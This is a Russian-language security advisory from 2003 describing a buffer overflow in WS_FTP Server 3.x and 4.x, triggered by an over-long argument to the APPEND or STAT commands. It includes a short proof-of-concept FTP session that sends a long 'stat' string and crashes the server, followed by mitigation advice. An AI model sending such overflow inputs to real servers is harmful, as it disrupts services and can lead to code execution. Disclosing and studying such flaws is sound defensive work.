Дата публикации: | 08.09.2003 |
Всего просмотров: | 1337 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: WS_FTP Server 3.x, 4.х Описание: Уязвимость обнаружена в WS_FTP Server. Удаленный или локальный пользователь может выполнить произвольный код на уязвимой системе. Уязвимость связанна с неправильной проверкой границ при обработке пользовательских данных в FTP командах APPEND или STAT. Злонамеренный пользователь может представить специально обработанный параметр длиннее 255 байт, чтобы вызвать переполнение буфера и выполнить произвольный код на целевой системе с привилегиями FTP сервера. Пример/Эксплоит: C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60 Connected to 81.93.35.60. 220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574) 220-Wed Sep 03 23:58:59 2003 220-29 days remaining on evaluation. 220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574) User (81.93.35.60:(none)): pejman 331 Password required Password: 230 user logged in ftp> quote Command line to send stat aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Connection closed by remote host. ftp> URL производителя: http://www.wsftp.com/ Решение: Разрешайте только доверенным пользователям доступ к FTP серверу. Фильтруйте злонамеренный ввод на FTP прокси. Используйте альтернативное программное обеспечение. |
|
Ссылки: | Remote and Local Vulnerabilities In WS_FTP Server |